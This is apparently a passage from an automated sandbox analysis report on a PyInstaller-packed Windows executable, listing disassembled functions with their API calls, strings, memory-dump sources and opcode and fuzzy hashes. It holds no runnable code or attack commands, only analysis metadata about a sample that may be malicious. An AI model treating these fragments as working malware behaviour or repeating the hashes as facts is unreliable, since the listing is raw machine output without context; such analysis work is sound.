                                                              • Associated: 00000001.00000002.1986917456.00007FFDFAF91000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986947251.00007FFDFAF93000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID:
                                                              • API String ID: 1452528299-0
                                                              • Opcode ID: 5563a82993f3f8e44ea2e202436c36dc659c7fe328bd3c98202d5b79c02492c4
                                                              • Instruction ID: 869cf6340b6ed18361f3e0b8af7436dbcb57097c18be151b4b840e96bd87ec08
                                                              • Opcode Fuzzy Hash: 5563a82993f3f8e44ea2e202436c36dc659c7fe328bd3c98202d5b79c02492c4
                                                              • Instruction Fuzzy Hash: C6318132B0828686E7A89F25956093D73D1EF50B64F5485B1FD294B7CDCE39E8929B00
                                                              Function 00007FFDFAEF7EB0 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986715794.00007FFDFAEE1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAEE0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986686816.00007FFDFAEE0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF54000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF56000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF79000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF84000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF8E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986917456.00007FFDFAF91000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986947251.00007FFDFAF93000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID:
                                                              • API String ID: 1452528299-0
                                                              • Opcode ID: f8a161ca16946112414120da3da362b423baedddf845a4f9c426056871324c08
                                                              • Instruction ID: e98d11601ce9d734c3088babfeb0a951ea07927e50e1133d3f1d15bb8aabc43b
                                                              • Opcode Fuzzy Hash: f8a161ca16946112414120da3da362b423baedddf845a4f9c426056871324c08
                                                              • Instruction Fuzzy Hash: C5218E3270878087D758DB26E5906ADB7A0FB88B90F044135EF9D47B98CF78D595CB00
                                                              Function 00007FFDFAEE1F32 Relevance: 1.3, APIs: 1, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986715794.00007FFDFAEE1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAEE0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986686816.00007FFDFAEE0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF54000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF56000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF79000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF84000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF8E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986917456.00007FFDFAF91000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986947251.00007FFDFAF93000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID:
                                                              • API String ID: 1452528299-0
                                                              • Opcode ID: d30e7c5704879f11d1e112ae6777e6cf3c1901bb9f2e947874565881c85a4ca2
                                                              • Instruction ID: ba01ca7f7d4e53c01a77495a065f0ca3b0a6b854275bb3ba5d9c3d5b82dba3fd
                                                              • Opcode Fuzzy Hash: d30e7c5704879f11d1e112ae6777e6cf3c1901bb9f2e947874565881c85a4ca2
                                                              • Instruction Fuzzy Hash: 8CF0813270878186D704AB16F8506AAA364FB98FC0F188071EF9E47BADDF3CD4818700

                                                              Non-executed Functions

                                                              Function 00007FF623F789E0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                              • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                              • API String ID: 3832162212-3165540532
                                                              • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                              • Instruction ID: 3aed286d157e905c324ad3ef33acb293cc86873df8d4c6a5941c2f645d6a3416
                                                              • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                              • Instruction Fuzzy Hash: 1DD16D32A08A8286EF108F35FC566A93760FF84B58F404275DA5EA7AA4DF3CD645C701
                                                              Function 00007FFDFAFA2671 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 168COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1987005152.00007FFDFAFA1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAFA0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986977487.00007FFDFAFA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFAFAD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB005000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB019000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB029000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB03D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1EE000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1F0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB21B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB24D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB272000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2E5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2F2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987760370.00007FFDFB2F6000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987789006.00007FFDFB2F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Similarity
                                                              • API ID: EnvironmentVariable$ByteCharMultiWide
                                                              • String ID: .rnd$HOME$RANDFILE$SYSTEMROOT$USERPROFILE
                                                              • API String ID: 2184640988-1666712896
                                                              • Opcode ID: 6ae7bf8170fe4eb4311700b15542d8ceb35a2668fc38af68052a7f4661d56c96
                                                              • Instruction ID: 386836ccefb1a3a6648a8af15dfc695728afe21ce18782c0dc62228b07ccaaf1
                                                              • Opcode Fuzzy Hash: 6ae7bf8170fe4eb4311700b15542d8ceb35a2668fc38af68052a7f4661d56c96
                                                              • Instruction Fuzzy Hash: EE61A722B097835AEB148F2694606796792EF45BA8B444335DE7D47BE8DF3DE405C300
                                                              Function 00007FFDFA113028 Relevance: 13.6, APIs: 9, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986363655.00007FFDFA111000.00000040.00000001.01000000.00000015.sdmp, Offset: 00007FFDFA110000, based on PE: true
                                                              • Associated: 00000001.00000002.1986336831.00007FFDFA110000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986363655.00007FFDFA174000.00000040.00000001.01000000.00000015.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986363655.00007FFDFA1C3000.00000040.00000001.01000000.00000015.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986363655.00007FFDFA21C000.00000040.00000001.01000000.00000015.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986363655.00007FFDFA221000.00000040.00000001.01000000.00000015.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986363655.00007FFDFA224000.00000040.00000001.01000000.00000015.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986626522.00007FFDFA225000.00000080.00000001.01000000.00000015.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986656867.00007FFDFA227000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                              Similarity
                                                              • API ID: 00007E133319ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3962975190-0
                                                              • Opcode ID: bc038827588cf40f583b99cfdd4304ae94c893dbf377535741e30029c5cf38f6
                                                              • Instruction ID: 14ca52b95090dd954b25d15923427935f59b39c3418d2397aba218147cac4eaf
                                                              • Opcode Fuzzy Hash: bc038827588cf40f583b99cfdd4304ae94c893dbf377535741e30029c5cf38f6
                                                              • Instruction Fuzzy Hash: 1A314B77B08A8195EB648F60E8607EE3368FB84744F45403ADA5E47A8CDF38C648C710
                                                              Function 00007FF623F783C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,00007FF623F78919,00007FF623F73F9D), ref: 00007FF623F7842B
                                                              • RemoveDirectoryW.KERNEL32(?,00007FF623F78919,00007FF623F73F9D), ref: 00007FF623F784AE
                                                              • DeleteFileW.KERNEL32(?,00007FF623F78919,00007FF623F73F9D), ref: 00007FF623F784CD
                                                              • FindNextFileW.KERNEL32(?,00007FF623F78919,00007FF623F73F9D), ref: 00007FF623F784DB
                                                              • FindClose.KERNEL32(?,00007FF623F78919,00007FF623F73F9D), ref: 00007FF623F784EC
                                                              • RemoveDirectoryW.KERNEL32(?,00007FF623F78919,00007FF623F73F9D), ref: 00007FF623F784F5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                              • String ID: %s\*
                                                              • API String ID: 1057558799-766152087
                                                              • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                              • Instruction ID: 0f2e9311231d59829123f820d5917aa47f6268b5efa6278cb531c73f6ed9f6bd
                                                              • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                              • Instruction Fuzzy Hash: 1E419121A0C54281EE209F24FC465BA6360FB94794F804272EA9EE76D4EF7CDB45C702
                                                              Function 00007FFDFAFA322E Relevance: 12.3, APIs: 8, Instructions: 251fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1987005152.00007FFDFAFA1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAFA0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986977487.00007FFDFAFA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFAFAD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB005000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB019000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB029000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB03D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1EE000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1F0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB21B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB24D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB272000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2E5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2F2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987760370.00007FFDFB2F6000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987789006.00007FFDFB2F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$FileFind$00007ErrorF020FirstLastNext
                                                              • String ID:
                                                              • API String ID: 1171239525-0
                                                              • Opcode ID: 2d14182a43d6b154a267ad0b98e55e0737c9bb517ed9d516c0e43a6e55635043
                                                              • Instruction ID: b2a7abb12b9f8869d53e1023960a1b1f2dd782aeb348ee72f4a81e8ed3a037bb
                                                              • Opcode Fuzzy Hash: 2d14182a43d6b154a267ad0b98e55e0737c9bb517ed9d516c0e43a6e55635043
                                                              • Instruction Fuzzy Hash: DEB18063F16A83C6EB108F26D464A7967A0FB49BA8F544235DA6D577ECEF3CE1418300
                                                              Function 00007FFDFAEFF660 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 349COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986715794.00007FFDFAEE1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAEE0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986686816.00007FFDFAEE0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF54000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF56000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF79000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF84000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF8E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986917456.00007FFDFAF91000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986947251.00007FFDFAF93000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Similarity
                                                              • API ID: 00007B6570
                                                              • String ID: ..\s\ssl\ssl_ciph.c$SECLEVEL=$STRENGTH
                                                              • API String ID: 4069847057-3120971754
                                                              • Opcode ID: 00428cabea7fd3b6168fb11fac7a55b194dcdbfea33d9ea37cf53fc0d03f83f0
                                                              • Instruction ID: 8c0c18b37693e534f0034941bc9f7dbf3566ba067ca4feda7a0f6e1e3f5d9c3c
                                                              • Opcode Fuzzy Hash: 00428cabea7fd3b6168fb11fac7a55b194dcdbfea33d9ea37cf53fc0d03f83f0
                                                              • Instruction Fuzzy Hash: 74E19072B0C2C28AE7689E15E460BBA77D1FB44784F145175DABF436D8DB3EE8418B20
                                                              Function 00007FFDFAEE2009 Relevance: 10.6, APIs: 7, Instructions: 73COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986715794.00007FFDFAEE1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAEE0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986686816.00007FFDFAEE0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF54000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF56000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF79000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF84000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF8E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986917456.00007FFDFAF91000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986947251.00007FFDFAF93000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3140674995-0
                                                              • Opcode ID: 7b50f7875cf20e6459c763a8328043929d4a5c3cbdb7a2902efd7c42dc142101
                                                              • Instruction ID: 85b70c40da9b1dcc0c5efdb383ac731c08eed409bde0ebb13f23c12bcfce83de
                                                              • Opcode Fuzzy Hash: 7b50f7875cf20e6459c763a8328043929d4a5c3cbdb7a2902efd7c42dc142101
                                                              • Instruction Fuzzy Hash: 8E315C72709A818AEB649F60E8507EE7360FB84765F404139EA5E4BBD8EF3CD648C710
                                                              Function 00007FFDFAFA5A24 Relevance: 10.6, APIs: 7, Instructions: 73COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1987005152.00007FFDFAFA1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAFA0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986977487.00007FFDFAFA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFAFAD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB005000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB019000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB029000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB03D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1EE000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1F0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB21B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB24D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB272000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2E5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2F2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987760370.00007FFDFB2F6000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987789006.00007FFDFB2F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3140674995-0
                                                              • Opcode ID: fd064582dca017b65f84a5af08fa13e40438419c70a5fa8198f5f7a8a5acb07e
                                                              • Instruction ID: 34728bca3c780abe89f4bf7b01c31a7f32861b6fdf49074f70c5f8e50ce3ca61
                                                              • Opcode Fuzzy Hash: fd064582dca017b65f84a5af08fa13e40438419c70a5fa8198f5f7a8a5acb07e
                                                              • Instruction Fuzzy Hash: 72315E72B19B8285EB609F61E860BEE3364FB84748F444439DA5D47BD8EF38D648C710
                                                              Function 00007FF623F7D12C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3140674995-0
                                                              • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                              • Instruction ID: 2f6d75af6617948ab989aabb87f3835874cf3c10ef7a8bcb6410c32cd4f5b9b5
                                                              • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                              • Instruction Fuzzy Hash: 1F312C72608B8586EF608F60F8817EE7365FB84748F44407ADA4E9BB98DF78D648C711
                                                              Function 00007FFDFAF91AA0 Relevance: 9.6, APIs: 4, Strings: 1, Instructions: 885librarymemoryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986917456.00007FFDFAF91000.00000080.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAEE0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986686816.00007FFDFAEE0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAEE1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF54000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF56000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF79000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF84000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF8E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986947251.00007FFDFAF93000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Similarity
                                                              • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                              • String ID: o load ssl3 md5 routines
                                                              • API String ID: 3300690313-1853573201
                                                              • Opcode ID: c8677da3c8e85dc9b3196f14a8083fd866e44611647329c6e590fc2bfa47a63d
                                                              • Instruction ID: 148ad59deb94365226bfbbed07af537029b34018a96a19a93e16d9f265109ce3
                                                              • Opcode Fuzzy Hash: c8677da3c8e85dc9b3196f14a8083fd866e44611647329c6e590fc2bfa47a63d
                                                              • Instruction Fuzzy Hash: 99622B2272819286F7598F38D81467D7690FB5C799F045632FAAEC77C8EA3CEA45C700
                                                              Function 00007FF623F95C00 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _get_daylight.LIBCMT ref: 00007FF623F95C45
                                                                • Part of subcall function 00007FF623F95598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF623F955AC
                                                                • Part of subcall function 00007FF623F8A948: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF623F92D22,?,?,?,00007FF623F92D5F,?,?,00000000,00007FF623F93225,?,?,?,00007FF623F93157), ref: 00007FF623F8A95E
                                                                • Part of subcall function 00007FF623F8A948: GetLastError.KERNEL32(?,?,?,00007FF623F92D22,?,?,?,00007FF623F92D5F,?,?,00000000,00007FF623F93225,?,?,?,00007FF623F93157), ref: 00007FF623F8A968
                                                                • Part of subcall function 00007FF623F8A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF623F8A8DF,?,?,?,?,?,00007FF623F8A7CA), ref: 00007FF623F8A909
                                                                • Part of subcall function 00007FF623F8A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF623F8A8DF,?,?,?,?,?,00007FF623F8A7CA), ref: 00007FF623F8A92E
                                                              • _get_daylight.LIBCMT ref: 00007FF623F95C34
                                                                • Part of subcall function 00007FF623F955F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF623F9560C
                                                              • _get_daylight.LIBCMT ref: 00007FF623F95EAA
                                                              • _get_daylight.LIBCMT ref: 00007FF623F95EBB
                                                              • _get_daylight.LIBCMT ref: 00007FF623F95ECC
                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF623F9610C), ref: 00007FF623F95EF3
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
